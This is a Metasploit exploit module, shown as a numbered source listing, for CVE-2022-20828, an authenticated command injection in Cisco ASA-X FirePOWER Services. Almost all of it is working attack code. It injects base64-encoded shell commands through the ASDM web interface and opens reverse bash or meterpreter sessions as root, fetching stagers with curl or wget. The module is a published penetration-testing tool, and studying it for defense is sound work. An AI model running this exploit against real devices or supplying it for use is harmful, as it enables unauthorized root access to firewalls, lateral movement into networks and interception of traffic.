Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  prepend Msf::Exploit::Remote::AutoCheck
10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Exploit::CmdStager
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection',
19
        'Description' => %q{
20
          This module exploits an authenticated command injection vulnerability affecting
21
          Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
22
          ASDM web server and lands in the FirePower Services SFR module's Linux virtual
23
          machine as the root user. Access to the virtual machine allows the attacker to
24
          pivot to the inside network, and access the outside network. Also, the SFR
25
          virtual machine is running snort on the traffic flowing through the ASA, so
26
          the attacker should have access to this diverted traffic as well.
27

28
          This module requires ASDM credentials in order to traverse the ASDM interface.
29
          A similar attack can be performed via Cisco CLI (over SSH), although that isn't
30
          implemented here.
31

32
          Finally, it's worth noting that this attack bypasses the affects of the
33
          `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
34
          available but this attack makes it available).
35

36
          Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
37
          support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
38
          and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
39
          versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
40
          receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
41
        },
42
        'License' => MSF_LICENSE,
43
        'Author' => [
44
          'jbaines-r7' # Vulnerability discovery and Metasploit module
45
        ],
46
        'References' => [
47
          [ 'CVE', '2022-20828' ],
48
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ],
49
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ],
50
          [ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html']
51
        ],
52
        'DisclosureDate' => '2022-06-22',
53
        'Platform' => ['unix', 'linux'],
54
        'Arch' => [ARCH_CMD, ARCH_X64,],
55
        'Privileged' => true,
56
        'Targets' => [
57
          [
58
            'Shell Dropper',
59
            {
60
              'Platform' => 'unix',
61
              'Arch' => ARCH_CMD,
62
              'Type' => :unix_cmd,
63
              'DefaultOptions' => {
64
                'PAYLOAD' => 'cmd/unix/reverse_bash'
65
              }
66
            }
67
          ],
68
          [
69
            'Linux Dropper',
70
            {
71
              'Platform' => 'linux',
72
              'Arch' => ARCH_X64,
73
              'Type' => :linux_dropper,
74
              'CmdStagerFlavor' => [ 'curl', 'wget' ],
75
              'DefaultOptions' => {
76
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
77
              }
78
            }
79
          ]
80
        ],
81
        'DefaultTarget' => 1,
82
        'DefaultOptions' => {
83
          'RPORT' => 443,
84
          'SSL' => true,
85
          'MeterpreterTryToFork' => true
86
        },
87
        'Notes' => {
88
          'Stability' => [CRASH_SAFE],
89
          'Reliability' => [REPEATABLE_SESSION],
90
          'SideEffects' => [ARTIFACTS_ON_DISK]
91
        }
92
      )
93
    )
94
    register_options([
95
      OptString.new('TARGETURI', [true, 'Base path', '/']),
96
      OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
97
      OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),
98
    ])
99
  end
100

101
  def check
102
    res = send_request_cgi({
103
      'method' => 'GET',
104
      'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'),
105
      'headers' =>
106
      {
107
        'User-Agent' => 'ASDM/ Java/1',
108
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
109
      }
110
    })
111
    return CheckCode::Unknown('The target did not respond to the check.') unless res
112
    return CheckCode::Safe('Authentication failed.') if res.code == 401
113
    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
114

115
    if res.body.include?('Invalid do command uid=0(root)')
116
      return CheckCode::Vulnerable("Successfully executed the 'id' command.")
117
    end
118

119
    CheckCode::Safe('The command injection does not appear to work.')
120
  end
121

122
  def execute_command(cmd, _opts = {})
123
    # base64 encode the payload to work around bad characters and then uri encode
124
    # the whole thing before yeeting it at the server
125
    encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&")
126
    res = send_request_cgi({
127
      'method' => 'GET',
128
      'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"),
129
      'headers' =>
130
      {
131
        'User-Agent' => 'ASDM/ Java/1',
132
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
133
      }
134
    })
135

136
    if res
137
      fail_with(Failure::Unreachable, 'The target did not respond.') unless res
138
      fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401
139
      fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
140
    end
141

142
    if session_created?
143
      # technically speaking, bash can hold the connection open and skip all the res checks
144
      # also passing the res checks doesn't actually mean that the target was exploited so
145
      # check a session was created to get verification
146
      print_good('Session created!')
147
    else
148
      fail_with(Failure::NotVulnerable, 'The exploit was thrown but not session was created.')
149
    end
150
  end
151

152
  def exploit
153
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
154

155
    case target['Type']
156
    when :unix_cmd
157
      execute_command(payload.encoded)
158
    when :linux_dropper
159
      execute_cmdstager
160
    end
161
  end
162
end
163

164